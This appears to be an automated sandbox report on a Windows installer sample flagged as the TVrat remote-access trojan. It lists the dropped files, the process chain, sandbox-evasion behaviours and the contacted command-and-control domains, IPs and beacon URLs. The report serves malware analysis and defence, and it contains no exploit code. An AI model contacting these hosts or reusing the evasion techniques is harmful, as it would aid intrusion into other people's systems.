                          Security Software Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Masquerading                          		LSA Secrets23
                          Virtualization/Sandbox Evasion                          		SSHKeylogging3
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials2
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Process Injection                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                          System Owner/User Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558734 Sample: wjpP1EOX0L.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 68 60 trs011.xn--80akicokc0aablc.xn--p1ai 2->60 62 id.xn--80akicokc0aablc.xn--p1ai 2->62 64 crypto-st.art 2->64 72 Yara detected TVrat 2->72 74 AI detected suspicious sample 2->74 11 wjpP1EOX0L.exe 2 2->11         started        14 ast.exe 4 2->14         started        signatures3 process4 file5 50 C:\Users\user\AppData\...\wjpP1EOX0L.tmp, PE32 11->50 dropped 16 wjpP1EOX0L.tmp 3 12 11->16         started        process6 file7 36 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 16->36 dropped 38 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 16->38 dropped 19 wjpP1EOX0L.exe 2 16->19         started        process8 file9 40 C:\Users\user\AppData\...\wjpP1EOX0L.tmp, PE32 19->40 dropped 22 wjpP1EOX0L.tmp 5 35 19->22         started        process10 file11 42 C:\Users\user\AppData\...\quartz.dll (copy), PE32 22->42 dropped 44 C:\Users\user\AppData\...\opus.dll (copy), PE32 22->44 dropped 46 C:\Users\user\...\libssl-1_1.dll (copy), PE32 22->46 dropped 48 29 other files (24 malicious) 22->48 dropped 25 cmd.exe 2 22->25         started        process12 process13 27 xcopy.exe 24 25->27         started        30 ast.exe 27 10 25->30         started        34 conhost.exe 25->34         started        dnsIp14 52 C:\Users\user\AppData\Roaming\im\quartz.dll, PE32 27->52 dropped 54 C:\Users\user\AppData\Roaming\im\opus.dll, PE32 27->54 dropped 56 C:\Users\user\AppData\...\libssl-1_1.dll, PE32 27->56 dropped 58 12 other files (11 malicious) 27->58 dropped 66 id.xn--80akicokc0aablc.xn--p1ai 212.193.169.65, 443, 44335, 49825 SAFIB-ASRU Russian Federation 30->66 68 trs011.xn--80akicokc0aablc.xn--p1ai 195.19.105.66, 44444, 50015 ROSTELECOM-ASRU Russian Federation 30->68 70 127.0.0.1 unknown unknown 30->70 76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 30->76 78 Tries to delay execution (extensive OutputDebugStringW loop) 30->78 80 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 30->80 82 Tries to detect virtualization through RDTSC time measurements 30->82 file15 signatures16

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          wjpP1EOX0L.exe8%ReversingLabs

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_setup64.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp3%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_setup64.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp3%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\AstCrp.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\ast.exe (copy)12%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\astclient.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\astrct.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\aw_sas32.dll (copy)4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\hatls.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-2EBQK.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-2G518.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-4POLO.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-5IUGA.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-82POG.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-88TFK.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-951GK.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp12%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-JCPUK.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-KGLTC.tmp4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-PDD2G.tmp4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-SD6OU.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-UA1D6.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-VCJTB.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libcrypto-1_1.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libcryptoMD.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libcurl.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libeay32.dll (copy)4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libjpeg-turbo-win.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libssl-1_1.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\msvcr120.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\opus.dll (copy)0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://id.xn--80akicokc0aablc.xn--p1ai:443t:0%Avira URL Cloudsafe
                          http://www.kngstr.com/?PreDefines.ishAbout0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443U0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443Io0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443L0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesntime10%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aie030%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335:0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443aw0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesw)u0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiexel0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335-0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443K0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aill0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typespeg-tu0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ait.dll0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai443...0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443-0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443:0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443ers0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443%0%Avira URL Cloudsafe
                          https://id.xn--80akico0%Avira URL Cloudsafe
                          http://crypto-st.art/update.phpy0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335y0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...430%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai_0%Avira URL Cloudsafe
                          http://www.kngstr.com/?PreDefines.ish0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aid0030%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/TypesYfT0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiexe70%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiq0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aillx;0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f40;a~80%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ais.dll0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aa0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b660%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443zo-0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66ln241119_8036.log0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66u0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443sw.~0%Avira URL Cloudsafe
                          http://www.kngstr.com/?PreDefines.isha0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai030%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66-80akicokc0aablc.x0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66m0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66w0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66c0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai000%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66e0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Y0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Q0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aillll0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66h0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...43AW0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiDUdu0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ait.l;0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443Wl0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aidll030%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443&w0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:4430wo~0%Avira URL Cloudsafe
                          https://id.xn-0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          trs011.xn--80akicokc0aablc.xn--p1ai
                          		195.19.105.66
                          		truefalse
                            		unknown
                            id.xn--80akicokc0aablc.xn--p1ai
                            		212.193.169.65
                            		truefalse
                              		high
                              crypto-st.art
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://id.xn--80akicokc0aablc.xn--p1ai:443/api/execfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.borland.com/namespaces/Typesntime1ast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typesast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.drfalse
                                    		high
                                    https://id.xn--80akicokc0aablc.xn--p1ai:443awast.exe, 0000000A.00000003.2819563853.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2746778261.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2670067675.000000000609D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://id.xn--80akicokc0aablc.xn--p1ai:443Last.exe, 0000000A.00000003.2476123740.0000000006075000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452887279.0000000006075000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0rwjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.indyproject.org/ast.exe.9.drfalse
                                        		high
                                        http://www.kngstr.com/?PreDefines.ishAboutwjpP1EOX0L.exe, 00000000.00000003.1720539531.00000000022AC000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1710614762.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000003.1713559295.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000003.1716936096.00000000021FD000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000003.00000003.2086719713.000000000234D000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://id.xn--80akicokc0aablc.xn--p1aie03ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://id.xn--80akicokc0aablc.xn--p1ai:44335:ast.exe, 0000000A.00000003.2476123740.0000000006075000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452887279.0000000006075000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://id.xn--80akicokc0aablc.xn--p1ai:443Uast.exe, 0000000A.00000003.2435889428.0000000006075000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://id.xn--80akicokc0aablc.xn--p1ai:44335/ast.exe, 0000000A.00000003.2452834986.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.borland.com/namespaces/Typesw)uast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://curl.haxx.se/docs/http-cookies.html#ast.exefalse
                                            		high
                                            https://id.xn--80akicokc0aablc.xn--p1ai:443Ioast.exe, 0000000A.00000003.2877051123.00000000060A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://id.xn--80akicokc0aablc.xn--p1ai:443t:ast.exe, 0000000A.00000003.2430087607.000000000605F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://datatracker.ietf.org/ipr/1526/ast.exe, 0000000A.00000000.2388256151.0000000000942000.00000002.00000001.01000000.0000000C.sdmp, ast.exe.9.drfalse
                                              		high
                                              https://id.xn--80akicokc0aablc.xn--p1aiexelast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://id.xn--80akicokc0aablc.xn--p1ai:44335-ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://curl.haxx.se/docs/copyright.htmlDast.exe, 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp, is-JCPUK.tmp.3.dr, libcurl.dll.9.drfalse
                                                		high
                                                https://id.xn--80akicokc0aablc.xn--p1ai:443Kast.exe, 0000000A.00000002.2979445587.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://id.xn--80akicokc0aablc.xn--p1ai:443-ast.exe, 0000000A.00000003.2452887279.0000000006075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.borland.com/namespaces/Typespeg-tuast.exe, 0000000A.00000002.2979445587.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://id.xn--80akicokc0aablc.xn--p1ai:443/ast.exe, 0000000A.00000003.2877051123.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2993259885.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2787353293.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2429957558.0000000006092000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2730238261.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2745744616.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2819335046.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2888016220.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2730618420.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2722515590.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2907031061.00000000060C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://id.xn--80akicokc0aablc.xn--p1ai:4430ast.exe, 0000000A.00000002.2988967323.00000000042E4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://id.xn--80akicokc0aablc.xn--p1ait.dllast.exe, 0000000A.00000003.2452887279.0000000006060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://id.xn--80akicokc0aablc.xn--p1aillast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://id.xn--80akicokc0aablc.xn--p1ai443...ast.exe, 0000000A.00000002.2982914474.0000000003194000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://id.xn--80akicokc0aablc.xn--p1ai:443:ast.exe, 0000000A.00000003.2551550301.00000000060F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.innosetup.com/wjpP1EOX0L.exe, 00000000.00000003.1711898611.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000000.00000003.1711597591.0000000002460000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000001.00000000.1712569015.0000000000401000.00000020.00000001.01000000.00000004.sdmp, wjpP1EOX0L.tmp.0.drfalse
                                                      		high
                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443ersast.exe, 0000000A.00000003.2856120074.00000000060A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://id.xn--80akicokc0aablc.xn--p1aiast.exe.9.drfalse
                                                        		high
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443%ast.exe, 0000000A.00000003.2551675843.0000000006097000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2561692182.000000000609A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525993259.0000000006099000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://id.xn--80akicoast.exe, 0000000A.00000002.2996363895.0000000008F8C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:44335yast.exe, 0000000A.00000002.2981320741.0000000002F4B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0swjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drfalse
                                                          		high
                                                          https://id.xn--80akicokc0aablc.xn--p1ai:443/ogast.exe, 0000000A.00000003.2730238261.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2819335046.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2888016220.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2730618420.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.00000000060C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://id.xn--80akicokc0aablc.xn--p1ai:44335ast.exe, 0000000A.00000003.2526279673.000000000607B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2452524284.0000000006086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443...43ast.exe, 0000000A.00000002.2981320741.0000000002F43000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.kngstr.com/?PreDefines.ishwjpP1EOX0L.exe, 00000000.00000003.1720539531.00000000022C2000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.exe, 00000002.00000003.2098213335.00000000022A5000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443/Cln241119_8036.logast.exe, 0000000A.00000003.2745744616.00000000060C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crypto-st.art/update.phpyast.exe, 0000000B.00000002.2513039914.0000000000D40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://id.xn--80akicokc0aablc.xn--p1ai:443/Cln241119_8036.logwast.exe, 0000000A.00000003.2745744616.00000000060C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.borland.com/namespaces/TypesYfTast.exe, 0000000B.00000002.2513073562.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://id.xn--80akicokc0aablc.xn--p1ai_ast.exe, 0000000A.00000003.2552338521.0000000006061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://datatracker.ietf.org/ipr/1524/ast.exe, 0000000A.00000000.2388256151.0000000000942000.00000002.00000001.01000000.0000000C.sdmp, ast.exe.9.drfalse
                                                                    		high
                                                                    https://id.xn--80akicokc0aablc.xn--ast.exe, 0000000A.00000003.2696699050.000000000608A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://id.xn--80akicokc0aablc.xn--p1aid003ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://crypto-st.art/update.phpast.exe, 0000000A.00000002.2980985284.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2513039914.0000000000D40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.openssl.org/)ast.exe.9.drfalse
                                                                        		high
                                                                        https://id.xn--80akicokc0aablc.xn--p1aiexe7ast.exe, 0000000A.00000003.2436010829.0000000006071000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2435889428.0000000006065000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2476123740.0000000006060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1aiqast.exe, 0000000A.00000002.2982914474.0000000003194000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://id.xn--80akicokc0aablc.xn--p1ais.dllast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
